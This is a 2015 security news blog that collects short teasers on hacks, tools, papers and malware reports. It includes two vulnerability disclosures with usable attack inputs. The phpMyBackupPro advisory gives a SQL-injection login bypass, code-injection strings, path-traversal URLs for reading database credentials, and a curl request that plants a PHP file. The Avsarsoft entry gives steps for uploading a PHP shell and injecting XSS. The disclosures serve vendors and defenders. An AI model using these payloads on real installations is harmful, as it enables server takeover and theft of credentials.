Sunday, April 26, 2015

Hackers temporarily take control of Tesla’s website, Elon Musk's Twitter account

Earlier today, Tesla's Twitter account and website were taken over by some nefarious jokesters. Around 5 PM ET,  a strange tweet popped up on the company's official Twitter account, suggesting the company was no longer in control of what was being posted. The tweets largely suggested this was just an unsophisticated prank.

more here.......http://www.theverge.com/2015/4/25/8497545/teslas-twitter-hacked

Unpacking CCTV Firmware

I’ve been increasingly interested interested in firmware and have also stated in my previous articles that I would write an article on unpacking and hacking firmware. I thought this would be a good start. This isn’t some old firmware, the build date is February 2015 and has some interesting features. I see a lot of people writing articles on routers and thought I’d change things up a little and look at CCTV.
a

Saturday, April 25, 2015

Paper: Compositional Decompilation using LLVM IR

Abstract
Decompilation or reverse compilation is the process of translating low-level
machine-readable code into high-level human-readable code. The problem is nontrivial
due to the amount of information lost during compilation, but it can be
divided into several smaller problems which may be solved independently. This
report explores the feasibility of composing a decompilation pipeline from independent
components, and the potential of exposing those components to the end-user.
The components of the decompilation pipeline are conceptually grouped into three
modules. Firstly, the front-end translates a source language (e.g. x86 assembly)
into LLVM IR; a platform-independent low-level intermediate representation. Secondly,
the middle-end structures the LLVM IR by identifying high-level control flow
primitives (e.g. pre-test loops, 2-way conditionals). Lastly, the back-end translates
the structured LLVM IR into a high-level target programming language (e.g. Go).
The control flow analysis stage of the middle-end uses subgraph isomorphism search
algorithms to locate control flow primitives in CFGs, both of which are described
using Graphviz DOT files.

Poster: Compositional Decompilation

more here........https://github.com/mewpaper/decompilation

Quagga BGP and exabgp: work together for BGP blackhole (dropoing undersirable traffic) implementation

In our test case we will deploy two machines: 10.0.3.114 for exabgp (it announce /32 prefix for blackholing on core router side) and 10.0.3.115 (it emulates core router). We will do this work on Debian 8 Jessie.

more here........http://www.stableit.ru/2015/04/quagga-bgp-and-exabgp-work-together-for.html

Insufficient TLS Protection in Composer (PHP)

Composer helps you declare, manage and install dependencies of PHP projects,
ensuring you have the right stack everywhere.

Pádraic Brady exclaims "this is a publicly disclosed unpatched vulnerability
on Composer's issue tracker since 2012.

The specific issue is a failure to perform TLS peer verification on remote
requests when making any API request or retrieving any file, i.e. there is a
singular client class.

more here.....https://github.com/composer/composer/issues/1074

An HTTP Status Code to Report Legal Obstacles

Abstract

   This document specifies a Hypertext Transfer Protocol (HTTP) status
   code for use when resource access is denied as a consequence of legal
   demands.

more here.........https://datatracker.ietf.org/doc/draft-ietf-httpbis-legally-restricted-status/

Malware Seen In The Middle East Region

This attack is from the same attack group as Cyber Attack 1. The attack comes as an email containing a malicious Google Docs link. It was seen around Mon 2/16/2015.



The email looks like below:


The subject translates as "Video: The Egyptian Army Conducts An Air Strike Against ISIL" and body translates as "On the dawn of Monday, the armed forces conducted a strike against some ISIL centers. The strike has met its target precisely, where ISIL camps and training places were targeted. In the video are ISIL casualities and the havoc left by the Egyptian Air Strike. Watch The Video".


more here including additional malware samples.........http://middleeastmalware.blogspot.com/2015/04/cyber-attack-10.html

OpenSSL Vs HSM Performance

Hardware Security Modules(HSMs) are basically dedicated cryptography devices, and are often one of the first links in the chain of trust in so much of what we do with technology today.  They allow you to offload sometimes computationally expensive, cryptographic functions like signing or encryption and are often required in industries whose regulations require tight control of private key material(e.g. banking, certificate authorities).  They also allow you to have reliable auditing capabilities and are designed to be extremely difficult to tamper with.  This article does not try to sway you one way or the other in terms of using an HSM, whether or not you need an HSM is usually determined by regulation or security requirements and not performance reasons. If you want are not interested how I arrived at the numbers, click here to see the results.
Having said that, I think there are more than a few people out there that think that dedicated hardware equals better performance.  This article attempts to explore this assumption of whether or not HSMs provide any performance benefit over using software, in this case OpenSSL, on commodity hardware.

Opportunity Knows No Boundary: A Case Study of Acquisition

On Monday, April 20, Raytheon and Websense announced a new venture, outlining the defense industry contractor’s planned acquisition of 80% of the internet security firm. By Thursday, April 23, an ambitious attack was unleashed and directed at Websense employees in the guise of a welcoming, if grammatically questionable, message. Emails with the subject “Welcome to join Raytheon!” were seen, containing a malicious file slyly tucked away inside a fake Kaspersky installation program.

more here.........http://community.websense.com/blogs/securitylabs/archive/2015/04/24/opportunity-knows-no-boundary-a-case-study-of-acquisition.aspx

Consideration and evaluation of using fuzzy hashing

More on Threatbutt, the new threat intelligence firm emerging out of RSA 2015- Hunt for Advanced APT with Threatbutt integration for Maltego

Maximum protection from hacker threats like 4Chan and Reddit and detailed docs on the Threatbutt API here.....https://github.com/ivanlei/threatbutt

VulnPryer- Pries more context into your vulnerability data

VulnPryer is the code behind a vulnerability reprioritization project. Using a vulnerability data feed (VulnPryer uses the VulnDB commercial project by default), VulnPryer will download that feed on an incremental basis, load the feed into MongoDB for storage, extract a mapping of features, and provide a remapping of vulnerabilities to custom severities for importing into your analysis product of choice (VulnPryer targets the RedSeal platform by default).

more here..........https://github.com/SCH-CISM/VulnPryer/blob/master/README.md


Also related, here are slides from the presentation titled "Vulnerability Management Nirvana:
A Study in Predicting Exploitability" from RSA 2015.....https://www.rsaconference.com/writable/presentations/file_upload/tech-f01_vulnerability-management-nirvana-a-study-in-predicting-exploitability.pdf

Building an Evil-AP with TL-MR3020 – Part 1 – Setup

So, recently I got my hands on a cheap TP-Link TL-MR3020 and figured I could create an Evil-AP as a project.

Flashing OpenWRT
It ships with a firmware which makes it really easy to upgrade/flash OpenWRT to it. Check this for instructions how to do this. Once it is flashed you should login to the web-page and set a root password, once that is done you’ll be able to SSH to the device as well.

more here...........http://0xdeadcode.se/archives/407

Friday, April 24, 2015

The Pmem Memory acquisition suite

The Rekall project has maintained a set of open source memory acquisition tools for a while now. After all, Memory acquisition is the first step in memory analysis. Before any analysis can be done, we need to acquire the memory in the first place. There are a number of commercial solutions to acquire memory, but sadly open source solutions have been abandoned or not maintained (For example win32dd has been a popular solution many years ago but has now been commercialized and is no longer open source).
We believe in open source forensic tools to make testing and transparency easier. We also believe that the availability of open source solutions spurs further development in the field and enables choices.
That is the reason we feel an open source, well tested and capable forensic memory acquisition tool is essential - we call it the Pmem suite of tools. The pmem acquisition tool aims to provide a complete imaging solution for Windows, Linux and OSX (OSXPmem is the only memory acquisition tool we are aware of, which works on the latest version of OSX - 10.10.x - commercial or open source).

more here.........http://rekall-forensic.blogspot.com/2015/04/the-pmem-memory-acquisition-suite.html

Google Security: A Javascript-based DDoS Attack as seen by Safe Browsing (revealing evidence of greatcannon tests from before the greatfire / github attack occurred)

To protect users from malicious content, Safe Browsing’s infrastructure analyzes web pages with web browsers running in virtual machines. This allows us to determine if a page contains malicious content, such as Javascript meant to exploit user machines. While machine learning algorithms select which web pages to inspect, we analyze millions of web pages every day and achieve good coverage of the web in general.

In the middle of March, several sources reported a large Distributed Denial-of-Service attack against the censorship monitoring organization GreatFire. Researchers have extensively analyzed this DoS attack and found it novel because it was conducted by a network operator that intercepted benign web content to inject malicious Javascript. In this particular case, Javascript and HTML resources hosted on baidu.com were replaced with Javascript that would repeatedly request resources from the attacked domains.

While Safe Browsing does not observe traffic at the network level, it affords good visibility at the HTTP protocol level. As such our infrastructure picked up this attack, too. Using Safe Browsing data, we can provide a more complete timeline of the attack and shed light on what injections occurred when.

more here......http://googleonlinesecurity.blogspot.com/2015/04/a-javascript-based-ddos-attack-as-seen.html

Sans Report on Iranian Cyber Attacks as reported by Norse and the American Enterprise Institute

On April 15, 2015 the New York Times released an article titled “Iran is Raising
Sophistication and Frequency of Cyberattacks, Study Says.”1 The article focuses
on the Iranian cyber threat as a whole but a significant portion of the article
highlighted a report by Norse, a cybersecurity intelligence company, and the
American Enterprise Institute (AEI). The article highlighted findings in an
upcoming Norse and AEI report. The report stated there were significant
increases in attacks on critical infrastructure and industrial control systems (ICS)
by the Iranian government. The report released by AEI and Norse, titled “The
Growing Cyberthreat from Iran”2 revealed claims of hundreds of thousands of
cyber attacks on worldwide infrastructure by Iran.

The purpose of this Defense Use Case (DUC) is to evaluate what can be learned
from the Norse report while also taking the opportunity to educate on what the
cyber security community would typically deem to be a cyber attack on ICS. After
reviewing the data provided in the report we agree that the data could be
interesting if put into proper context or analyzed along with additional data.
However, the data and events described in the report do not conclusively meet
the threshold of what the authors of this DUC would deem as ICS cyber attacks.

more here..........http://ics.sans.org/media/SANSICS-DUC3-Norse-Iran-Report.pdf

phpMyBackupPro Multiple Vulnerabilities

* Affected software: phpMyBackupPro
* Website: http://www.phpmybackuppro.net/

* Changelog: File doc/HISTORY.txt in the release zip file states
"03/26/2015: v.2.5:  security fixes in mutli user mode, minor bug
fixes"

* Reported by: Matthew Daley
* Timeline:
2015-03-26: Private disclosure to vendor
2015-03-27: Vendor response
2015-03-31: v2.5 released
2015-04-04: Private note to vendor that some issues (#2, #3, #4 below)
remain unfixed
2015-04-25: Public disclosure


--- Issue #1: SQL injection in multi-user mode

* Affected versions: ? -> 2.4
* Fixed version: 2.5
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/35/ (still private)

* Description:
In multi-user mode, the username and password given when a user logs
in is not escaped before interpolation into the SQL query that is used
to look up users in the database. Hence, it is vulnerable to a simple
SQL injection attack.

The injection occurs at line 70 of login.php:
$res=mysql_query("select * from user where
(User='".$_POST['username']."' or User='') and
password=password('".$_POST['password']."')");

The documentation given in documentation/MULTI_USER_MODE.txt states:
You will have to provide the MySQL root account data which are used by phpMyBackupPro to determine all available 
MySQL users.
Hence, it's highly likely that unauthenticated attackers are able to
enumerate all database entries and complete database configuration
information, such as user password hashes, using this vulnerability. A
tool such as sqlmap can be (and has been) used to do this.

It's also possible to exploit this vulnerability in order to log in as
any user given a victim's username. To do so, an attacker logs in with
the victim's username and the string "') OR 1=1-- " as password.

It's also possible to "log in" without a known username. To do so, an
attacker logs in with a username such as "../../../../../../../../tmp"
(which gets injected into the per-user configuration file path) and
the password string given above. This allows phpMyBackupPro to create
a multi-user config file in the /tmp directory regardless of how the
per-user configuration file path been configured.

In v2.5, this issue is fixed.


--- Issue #2: Arbitrary code execution through user configuration variables

* Affected versions: ? -> 2.5
* Fixed version: none
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/36/ (still private)

* Description:
It's possible, once logged in to phpMyBackupPro, to execute arbitrary
PHP code. This is done by injecting it into a configuration variable
using a PHP variable variable or by breaking out of the string literal
in which the variable's value is stored in the user's configuration
file.

For example, setting a user's "delete local backups after x days"
configuration variable to the following value causes the file /tmp/xyz
to be created:
${`touch /tmp/xyz`}

The value is stored unchanged in the user's configuration file
(phpMyBackupPro_conf.php) as follows:
$CONF['del_time']=htmlspecialchars_decode("${`touch /tmp/xyz`}");

As the value is not escaped before being interpolated into the
configuration file's content, the embedded PHP code (in this case, a
single backticked shell statement) will be executed when the
configuration file is include_once'd. This includes the next loading
of any phpMyBackupPro page by that user.

(Note: Upon setting the value, the message "delete local backups after
x days' is not correct!" will be displayed; however, the setting is
still written to the user's configuration file.)

In v2.5, it is no longer possible to use PHP variable variables to
gain RCE in this way. However, it is still possible to break out of
the configuration variable's value string literal and achieve RCE in
other ways (e.g. \');`touch /tmp/xyz`;// ).


--- Issue #3: Information disclosure through get_file.php functionality

* Affected versions: ? -> 2.5
* Fixed version: none
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/37/ (still private)

* Description:
It's possible, once logged in to phpMyBackupPro, to view (among other
filetypes) the content of any .php file using the functionality
provided by the get_file.php file. This includes the content of
phpMyBackupPro's own configuration files, which contain sensitive
information such as root database credentials.

For example, after logging in, a request to get_file.php can be made
to retrieve the content of definitions.php by using the following URL:
http://[host]/phpMyBackupPro/get_file.php?view=definitions.php

This will output the content of definitions.php, including the
location of the global configuration file (as the value of the
_PMBP_GLOBAL_CONF variable). Using this information, another request
can be made, this time for this global configuration file:
http://[host]/phpMyBackupPro/get_file.php?view=/[path]/global_conf.php

This will disclose the content of the global configuration file,
including root database credentials.

In v2.5, it is no longer possible to disclose the content of
phpMyBackupPro's configuration files by using get_file.php with a
direct path reference to the configuration file in question. However,
it is still possible by using indirect path references (e.g. replacing
"../../files/global_conf.php" with
"../../files/../files/global_conf.php").


--- Issue #4: Arbitrary code execution through scheduled backup scripts

* Affected versions: ? -> 2.5
* Fixed version: none
* Bug entry: https://sourceforge.net/p/phpmybackup/bugs/38/ (still private)

* Description:
It's possible, once logged in to phpMyBackupPro, to execute arbitrary
PHP code. This is done by injecting it into an automatically-generated
scheduled backup script.

Many of the user-specified parameters used when generating a scheduled
backup script are not correctly escaped before being interpolated into
the script; for example, the "period" parameter.

This can be exploited by eg. using curl:
curl -b 'PHPSESSID=[session cookie]' -d 'man_dirs=x&path=[writeable
path]/&filename=rce.php&period=;echo+"<h1>RCE</h1>"'
'http://[host]/phpMyBackupPro/scheduled.php&apos;

This will lead scheduled.php to create a scheduled backup script named
"rce.php" in the attacker-specified writable path with the following
content:
<?php
// This script was created by phpMyBackupPro v.2.4
(http://www.phpMyBackupPro.net)
// In order to work probably, it must be saved in the directory writable/.
$_POST['man_dirs']="x";
$period=(3600*24);echo "<h1>RCE</h1>";
$security_key="d06378763f9369ceea61663c33e0e8ca";
// switch to the phpMyBackupPro v.2.4 directory
@chdir("/var/www");
@include("backup.php");
// switch back to the directory containing this script
@chdir("writable/");
?>

Note that the "period" value is interpolated into the content without
being escaped. The attacker can then execute the newly-created
"rce.php", along with the injected PHP code, by making a normal HTTP
request for the file.

This obviously requires the attacker to know a web-accessible and
web-writeable directory to pass in as the "path" parameter to
scheduled.php.

In v2.5, it is no longer possible to split the "period" PHP statement
with a semicolon. However, it is possible to still inject code using
many other methods (e.g. .print("RCE") ). There are also other
injectable parameters, e.g. dirs[]=".print("RCE2")."' .

Announcing ShadowOS

ShadowOS is a free tool designed by Fortify on Demand to help Security and QA teams test Android applications for security vulnerabilities. It is a custom OS based off of KitKat that intercepts specific areas of the device's operation and makes testing apps for security vulnerabilites easier.  The OS runs as an emulator image so no hardware is required.


more here......http://h30499.www3.hp.com/t5/Fortify-Application-Security/Announcing-ShadowOS/ba-p/6725771

Pre-authentication XXE vulnerability in the Services Drupal module

From the Drupal website (https://www.drupal.org/project/services), the
Services module is:
“A standardized solution of integrating external applications with Drupal.
Service callbacks may be used with multipleinterfaces like REST, XMLRPC,
JSON, JSON-RPC, SOAP, AMF, etc. This allows a Drupal site to provide
web services viamultiple interfaces while using the same callback code."
The Services module can be configured to enable REST endpoints. The
REST handler can deals with JSON messages, PHP serialized objects and
also XML messages.

1.2. The issue
We discovered that the function handling XML REST requests does not
disable external entity loading when parsing XML messages sent by remote
users. If a user sends crafted XML messages referencing external resources
such as local files,the XML parser will load them during the message processing.
Using several tricks, the remote user can read local files.

In addition, we discovered that authentication and user rights are checked after
processing the message. Consequently, the vulnerability can be triggered without
being authenticated. A successful exploitation could allow anyone to read
arbitrary files on the remote file system, including the Drupal settings.php file.

more here..........http://synacktiv.ninja/ressources/synacktiv_drupal_xxe_services.pdf

TRACE A CHAIN OF DNS SERVERS BACK TO THE SOURCE

dnstracer – determines where a given Domain Name Server (DNS) gets its information from for a given hostname, and follows the chain of DNS servers back to the authoritative answer.

read more here........http://securityblog.gr/2541/trace-a-chain-of-dns-servers-back-to-the-source/

3rd German PowerShell Conference Materials & Impressions

On this page you find the materials presented at the 3rd German PowerShell Conference, Apr 21-23, 2015. The knowledge wrapped inside of them is free to anyone. and you can freely use that knowledge here......http://www.powertheshell.com/psconf2015/wpk2015materials/

Cisco releases first transparency report, showing literally nothing to hide

Networking supergiant Cisco has become the latest big firm to release a transparency report, detailing its approach to dealing with requests for information from governments and police forces, and listing how many such requests have been received and responded to.

more here........https://nakedsecurity.sophos.com/2015/04/24/cisco-releases-first-transparency-report-showing-literally-nothing-to-hide/

Paper: I Know Where You’ve Been: Geo-Inference Attacks via the Browser Cache & Video Attack Demo

Abstract—Many websites customize their services according
to different geo-locations of users, to provide
more relevant content and better responsiveness, including
Google, Craigslist, etc. Recently, mobile devices further
allow web applications to directly read users’ geo-location
information from GPS sensors. However, if such websites
leave location-sensitive content in the browser cache, other
sites can sniff users’ geo-locations by utilizing timing sidechannels.
In this paper, we demonstrate that such geolocation
leakage channels are widely open in popular
web applications today, including 62% of Alexa Top 100
websites. With geo-inference attacks that measure the
timing of browser cache queries, we can locate users’
countries, cities and neighborhoods in our case studies.
We also discuss whether existing defenses can effectively
prevent such attacks and additional support required for
a better defense deployment.




Covert channels – (Mis)Using ICMP protocol for file transfers with scapy

Hello w0rld. In this post I will show how it is possible to (mis)use ICMP protocol for file transfers with scapy here.....http://labs.jumpsec.com/2015/04/24/covert-channels-misusing-icmp-protocol-for-file-transfers-with-scapy/

Biometrics May Ditch The Password, But Not The Hackers

Passwords get hacked — a lot. In an effort to move beyond passwords, big companies are embracing biometric technology: the use of fingerprints, iris scans or voice recognition for user identification.

To heighten security, smartphones are being outfitted with biometric features. But, ditching passwords for biometrics may not make the hackers go away.

more here.........http://www.npr.org/blogs/alltechconsidered/2015/04/23/401466507/biometrics-may-ditch-the-password-but-not-the-hackers

SEND MESSAGE TO SKYPE CONTACT USING C#

Let’s see how can we send a message in Skype from a C# application. I chose skype just for the demonstration. You could pick any application and do anything with the following code.

more here..........http://securityblog.gr/2538/send-message-to-skype-contact-using-c/

Magento Shoplift (SUPEE-5344) Exploits in the Wild

As warned a few days ago, the Magento Shoplift (SUPEE-5344) vulnerability details have been disclosed by the CheckPoint team. They show step by step how it can be exploited to take over a vulnerable Magento site.

more here.......https://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.html

Bedep’s DGA: Trading Foreign Exchange for Malware Domains

As initially researched by Trend Micro [1] [2], Zscaler [1] [2], Cyphort, and Malware don’t need Coffee, the Bedep malware family focuses on ad / click fraud and the downloading of additional malware. ASERT’s first sample dates from September 22, 2014, which is in line with when Trend Micro started seeing it in their telemetry. In early 2015, the family got some more attention when it was being observed as the malware payload for some instances of the Angler exploit kit, leveraging the Adobe Flash Player exploit (CVE-2015-0311) which at the time was a 0day. It was also observed that this newer version was using a domain generation algorithm (DGA) to generate its command and control (C2) domain names.

This post provides some additional notes on the DGA including a proof of concept Python implementation, a look at the two most recent sets of DGA generated domains, and concludes with some sinkhole data.

more here.......http://www.arbornetworks.com/asert/2015/04/bedeps-dga-trading-foreign-exchange-for-malware-domains/

The DoD Cyber Strategy

Paper: Fast as a Shadow, Expressive as a Tree: Hybrid Memory Monitoring for C

One classical approach to ensuring memory safety of C programs is
based on storing block metadata in a tree-like datastructure. However
it becomes relatively slow when the number of memory locations
in the tree becomes high. Another solution, based on shadow
memory, allows very fast constant-time access to metadata and led
to development of several highly optimized tools for detection of
memory safety errors. However, this solution appears to be insuf-
ficient for evaluation of complex memory-related properties of an
expressive specification language.

In this work, we address memory monitoring in the context of
runtime assertion checking of C programs annotated in E-ACSL, an
expressive specification language offered by the FRAMA-C framework
for analysis of C code. We present an original combination
of a tree-based and a shadow-memory-based techniques that reconciles
both the efficiency of shadow memory with the higher expressiveness
of annotations whose runtime evaluation can be ensured
by a tree of metadata. Shadow memory with its instant access
to stored metadata is used whenever small shadow metadata suf-
fices to evaluate required annotations, while richer metadata stored
in a compact prefix tree (Patricia trie) is used for evaluation of
more complex memory annotations supported by E-ACSL. This
combined monitoring technique has been implemented in the runtime
assertion checking tool for E-ACSL. Our initial experiments
confirm that the proposed hybrid approach leads to a significant
speedup with respect to an earlier implementation based on a Patricia
trie alone without any loss of precision.

more here.......http://kosmatov.perso.sfr.fr/nikolai/publications/jakobsson_ks_sac_2015.pdf

Cloudflare: Of Phishing Attacks and WordPress 0days

Proxying around 5% of the Internet’s requests gives us an interesting vantage point from which to observe malicious behavior. It also make us a target. Aside from the many, varied denial of service attacks that break against our defenses we also see huge number of phishing campaigns. In this blog post I will dissect a recent phishing attack that we detected and neutralized with the help of our friends at Bluehost.
An attack that is particularly interesting as it appears to be using a brand new WordPress 0day.

more here......https://blog.cloudflare.com/of-phishing-attacks-and-wordpress-0days/

Win32/Xswkit (alias Gootkit)

Gootkit second UAC bypass method + arbitrary dll injection reconstructed here....http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669&p=25733#p25733

Thursday, April 23, 2015

WordPress < 4.1.2 Stored XSS vulnerability

tldr; mysql → special characters → truncation → input validation → output sanitation → xss → time to update WordPress

read more here......https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

Measuring SSL Performance: RSA keys

So you're about to make an RSA key for an SSL certificate. What key size should you use?

OpenSSL now use a 2048 bit key by default.
Windows certreq makes you explicitly specify a key size and uses 2048 bit examples in its documentation
If you want to show the verified company name in the green bar in a browser, you'll need an EV certificate, which requires a 2048 bit RSA key at minimum.

more here.......https://certsimple.com/blog/measuring-ssl-rsa-keys

4k ULTRA HIGH DEFINITION Satellite Security Research - DVB-S2X Security Evaluation Draft Notes

Author: Nicholas Lemonias

Advisory Date: 23/4/2015

 4k Satellite Security Research - DVB-S2X Standard Evaluation Notes


#             .       .                   .       .      .     .      .
#            .    .         .    .            .     ______
#        .           .             .               ////////
#                  .    .   ________   .  .      /////////     .    .
#             .            |.____.  /\        ./////////    .
#      .                 .//      \/  |\     /////////
#         .       .    .//          \ |  \ /////////       .     .   .
#                      ||.    .    .| |  ///////// .     .
#       .    .         ||           | |//`,/////                .
#               .       \\        ./ //  /  \/   .
#    .                    \\.___./ //\` '   ,_\     .     .
#            .           .     \ //////\ , /   \                 .    .
#                         .    ///////// \|  '  |    .
#        .        .          ///////// .   \ _ /          .
#                          /////////                              .
#                   .   ./////////     .     .
#           .           --------   .                  ..             .
#   .               .        .         .                       .
#                          ________________________
#  ____________------------                        -------------_________


                -=[ Advanced Information Security Corporation ]=-


 Abstract
 ==========
During a security evaluation of the Digital Video Broadcasting for
Satellite-S2X  (Extended) for UHD/4K compatible ecosystems; conducted
internally by the   Advanced Information Security
Group, instances of insecure function use were observed, which could
lead to exploitation of these systems.

 Introduction
 ==========
Ultra High Definition is rapidly growing into the next revolution of
virtual reality,
beyond HDTV. Ultra HD envisages to deliver a surreal cinematic
experience, to  the next generation broadcasting world. Ultra High
Definition is a digital  format that can process and deliver 4k and 8k
pixel resolution data.

The prolonged encoding rates operate on the basis of an equilibrated
analogy of up to 60 fps. Thus the higher the frame rates , the higher
are also the demands in data transfer technology.

High Bandwidth content utilize hybrid architectures and make use of
fiber optic technologies, cable networks, wireless architectures and
high powered DTH satellite broadcasting systems. DTH satellites
operate at higher frequency rates mostly at the Ka band or higher.

The Japanese Government was one of the first to practically implement
the UHD 4K System over satellite, in practice. In their experiment
prominent environmental predicaments concluded to modifications of
modulation methods due to rain attenuation issues. It is pertinent to
note, that however no security considerations were mentioned in their
experiment.

During an internal security evaluation of the extended version of
(DVB-S2X), multiple security predicaments were observed.

Review of DVB-S2X
================
The DVB-S2X is the extended version of DVB-S2 which was officially
presented by the DVB Consortium in 2014.

The new standard provides a number of technical enhancements for
support of DVB-S2X ecosystems; such as an improvised and faster
modulation for the delivery of UHD Services, however during our
security evaluation no security considerations are made.

Therefore it is pertinent to note that the older versions of DVB/S2
and current DVB/S2X (Extended) do support a fully-fledged Internet
Protocol interoperation.

The DVB-S2X offers very-low carrier-to-noise and low-carrier to
interference ratios, below 10 –db. (SNR) which makes it suitable for
professional and even military deployments.

Although, the following enhancements are made:
• Low roll off and smaller carrier spacing.
• Advanced Filtering technologies for bandwidth.
• Forward Error Correction Enhancements with added support for (64,
128, 256APSK) for professional and military applications, for extended
requirements, improved spectral efficiency and increased granularity.
• Bonding mechanisms for streams of TV data.
• Improvements for Optimal Modulation (MODCOD).
• A very low SNR MODCOD to support mobile architectures from land, sea
and air. Additional modulation enhancements have been provided in the
QPSK and BPSK range, in order to enhance atmospheric interference
protection mechanisms.
• The VLSNR MODCOD packet header was modified with the inclusion of a
PLH (Physical Layer header) and the addition of a significantly better
error correction coding system.
• Wideband Support for improved signal propagation.

During our evaluation it was asserted that the current composition of
DVB/S2x fails significantly to adhere to best practice and security
fundamentals. There are no security controls entailed for the
provision of fundamental security services of Confidentiality,
Integrity, Availability, (Non-Repudiation and Data Origin
Authentication). Although a two-way scrambling method is entailed,
that cannot substitute encryption.

This security issue stems from the lack of encryption of plain-text
information, as it is received by an L2 source, throughout the
encapsulation of information.  Current implementations use  Standard
Internet Security Protocols to bridge the gap.

 The lightweight architecture of protocols such MPEG-2/MPEG-4, can be
subtle to overhead and service degradation;

This affects DVB-S2 and S2x compatible ecosystems that transmit
information using MPEG-2 over IP / MPEG-4 TS protocol over IP, which
make them subtle to eavesdropping attacks.

The DVB/S2 and DVB/S2X supports a fully-fledged IP interoperation.
Therefore this current composition of DVB/S2X fails to address the
inherent security instances at the core of the problem, during its
embryonic stages.


Security consideration should be made using a rather pedantic layered
approach to security.

Current designs of HEVC modulation (in DVB/S2X) lack fundamental
security services such as those of Confidentiality, Integrity,
Availability and Non-Repudiation.

It is pertinent to note that the DVB/S2x support for backward
compatibility, with MPEG-2 over IP which can be abused by
threat-actors.

Technological and market transformation from DVB/S2 to DVB-S2x is a
lengthy process for manufacturers and satellite service providers
alike.

4The importance of confidentiality is paramount for the protection and
prevention of unauthorized access to private information.

A malicious attacker could take advantage of this lack of security
services, to passively wiretap bits of plain-text information.  HEVC
Fuzzing techniques can be used for the extraction of information that
may be contained in HEVC bit-stream structures and access units.


Attacks against 4K ecosystems
============================

Man-in the middle attacks

Repudiation Attacks

Denial of Service attacks against the actual satellite ecosystem
(while in orbit)

Replaying & Reordering attacks


MPEG-2 and H.264/MPEG-4 vulnerabilities
===================================

Thus in a MPEG-2 – TS transmission, the network identifies the “TS
logical channel”, and the PDU units received.

For instance a Transport Stream contains multiplexed data , multiple
packet sources, entailing the payload from a number of PES data
streams.

This lack of integrity and data origin authentication in the
encapsulated MPEG-2 Transport Stream packets over DVB-S2X can be
problematic.

Attacks that seek to fabricate, falsify, alter or delete information
are feasible due to the lightweight protocol characteristics.

Whilst current methodologies suggest that encryption can be provided
using standard Internet Security Protocols such as IPSEC, this only
bridges the gaps.

Another security problem arising from the lack of  confidentiality and
integrity, is that the plain-text streams contain hardware MAC or NPA
addresses of the participating  L2 destination.


Conclusion
============
However the Internet Protocol Security (IPSEC) provides advantageous
considerations in MPEG-2 over IP in satellite infrastructures, and
such are: interoperability; it does also present a trade-off between
Quality of Service.

Satellite security over 4k broadcasting is reliant on standard
security protocols to address inherent security issues.
Citing an example, an IPsec security gateway in tunnel mode, would
reveal disadvantages in terms of network overhead and QoS.

ML-IPSEC
==========
ML-IPsec attempts to address the problems arising from the use of
IPsec, although the issue of mobility is presented, which creates a
plethora of other issues to service providers and users alike.


SSL Vulnerabilities
================
Ecosystems that make use of SSL , are prone to a variety of attacks.
In the light  of recent issues; FREAK SSL/TLS, BEAST, Heart Bleed, DoS
attacks (NULL pointer dereference / memory exhaustion) are some of the
vulnerabilities affecting SSL implementations.


References
============
US CERT, (2015). FREAK-SSL Vulnerability. [online] Available at:
https://www.us-cert.gov/ncas/current.../FREAK-SSLTLS-Vulnerability
[Accessed 23 Apr. 2015].

DVB Consortium, (2015). DVB-S2X. [online] Available at:
http://www.dvb.org/resources/public/standards/a83-2_dvb-s2x_den302307-2.pdf
[Accessed 23 Apr. 2015].

Securityfocus Website, (2015). OpenSSL Advisory.. [online] Available
at: http://www.securityfocus.com/archive/1/535167 [Accessed 23 Apr.
2015].

Us-cert.gov, (2015). OpenSSL 'Heartbleed' vulnerability
(CVE-2014-0160) | US-CERT. [online] Available at:
https://www.us-cert.gov/ncas/alerts/TA14-098A [Accessed 23 Apr. 2015].

IRC Botnets alive, effective & evolving

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel. It usually involves a Botnet operator controlling the IRC bots through a previously configured IRC server & channel. The Botnet operator, after appropriate checks, periodically moves the IRC bot to a new IRC channel to thwart researchers & automated sandboxes from monitoring the commands.

In this blog, we will look at one of the most prevalent IRC based malware families - DorkBot, followed by three additional IRC Botnet families - RageBot, Phorpiex, and IRCBot.HI.

more here........http://research.zscaler.com/2015/04/irc-botnets-alive-effective-evolving.html

Crash Triage with SemTrax (CVE-2014-2525)

In this post we’ll look at how SemTrax can be used to help quickly identify the root cause of a crash. Successful fuzzers tend to make triage and prioritisation the most costly part of bug finding, and this is one of the use-cases we’ve focused on when designing SemTrax.

more here......http://www.getsemtrax.com/2015/04/23/crash-triage-with-semtrax-cve-2014-2525.html

Avsarsoft Matbaa Script - Multiple Vulnerabilities

#Title  : Avsarsoft Matbaa Script - Multiple Vulnerabilities
#Author  : ZoRLu / zorlu () milw00rm com
#Website : milw00rm.com / milw00rm.net / milw00rm.org
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test  : Windows7 Ultimate
#Discovery : 15/04/15
#Publish    : 23/04/15
#Thks  : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net, cxsecurity.com and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx
#Demo       : http://avsarsoft.com/matbaa/
#Demo User  : sop08574 () qisdo com
#Demo Pass  : 123456

1) Remote File Upload Vulnerability

you go here:

localhost/path/index.php?Git=KartvizitTasarla

localhost/path//index.php?Git=BrosurTasarla

localhost/path/index.php?Git=DavetiyeTasarla

after click to "Resim Ekle"

select your php file and wait for upload

after go here for you php file

localhost/path/upload/file.php

1) Multiple XSS Vulnerabilities

register to site 

localhost/path/index.php?Git=UyeOl

after login

localhost/path/index.php?Git=Uyelik

after go here and add your xss code

localhost/path/index.php?Git=KontrolPaneli&Sayfa=KisiselBilgilerim

localhost/path/index.php?Git=KontrolPaneli&Sayfa=AdresBilgilerim

localhost/path/index.php?Git=KontrolPaneli&Sayfa=Yorumlar

Pligg CMS 2.0.2 - Stored XSS

#Affected Vendor: http://pligg.com/
#Date: 23/04/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: Persistent XSS
#Tested on: Windows 8.1
#Product: Pligg CMS
#Version: 2.0.2
